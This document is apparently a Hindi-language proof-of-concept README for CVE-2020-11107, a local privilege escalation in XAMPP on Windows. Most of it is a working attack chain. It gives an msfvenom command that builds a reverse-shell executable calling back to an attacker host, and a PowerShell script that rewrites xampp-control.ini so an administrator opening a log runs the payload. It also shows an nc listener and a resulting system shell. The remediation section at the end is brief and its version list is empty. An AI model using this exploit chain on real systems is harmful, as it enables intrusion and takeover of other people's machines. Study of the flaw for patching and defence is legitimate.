
CVE-2020-11107-Local-Privilege-Escalation-XAMPP-7.2.29-7.3.x-7.3.16-7.4.x-7.4.4
CVE-2020-11107 एक स्थानीय विशेषाधिकार वृद्धि (LPE) भेद्यता है जो Windows पर Apache Friends XAMPP को प्रभावित करती है।
एक अन-प्रिविलेज्ड (सीमित अधिकार वाला) उपयोगकर्ता XAMPP Control Panel कॉन्फ़िगरेशन फ़ाइल (xampp-control.ini) को संशोधित कर सकता है और डिफ़ॉल्ट एडिटर एक्ज़ीक्यूटेबल (notepad.exe) को एक दुर्भावनापूर्ण एक्ज़ीक्यूटेबल से बदल सकता है।
जब कोई अन्य उपयोगकर्ता (जैसे एडमिनिस्ट्रेटर) Control Panel से लॉग खोलता है, तो दुर्भावनापूर्ण बाइनरी पीड़ित के विशेषाधिकारों के साथ निष्पादित होती है, जिसके परिणामस्वरूप विशेषाधिकार वृद्धि होती है।
❗ यह भेद्यता Linux या macOS को प्रभावित नहीं करती।
xampp-control.ini वैश्विक रूप से लिखने योग्य हैC:\xampp\xampp-control.ini
C:\xampp\xampp-control.exe
XAMPP संस्करण सत्यापित करें:
type C:\xampp\properties.ini
उदाहरण आउटपुट:
base_stack_version=7.3.10-1
base_stack_platform=windows-x64
✅ संस्करण भेद्य है।
msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=192.168.xxx.xxx LPORT=4444 \
-f exe -o msf.exe
mkdir C:\temp
# Upload msf.exe into C:\temp
शोषण स्क्रिप्ट (PowerShell):
# CVE-2020-11107 PoC
$file = "C:\xampp\xampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
$replace = "C:\temp\msf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file
स्क्रिप्ट चलाएँ:
powershell -ExecutionPolicy Bypass -File 50337.ps1
पीड़ित चलाता है:
C:\xampp\xampp-control.exe
फिर Control Panel से कोई भी लॉग फ़ाइल खोलता है।
nc -lvnp 4444
✅ परिणाम:
Connection received...
C:\WINDOWS\system32>
🎉 विशेषाधिकार वृद्धि सफल
XAMPP को निम्नलिखित संस्करणों (या नए) में अपडेट करें:
अनुमतियों को प्रतिबंधित करें:
C:\xampp\xampp-control.ini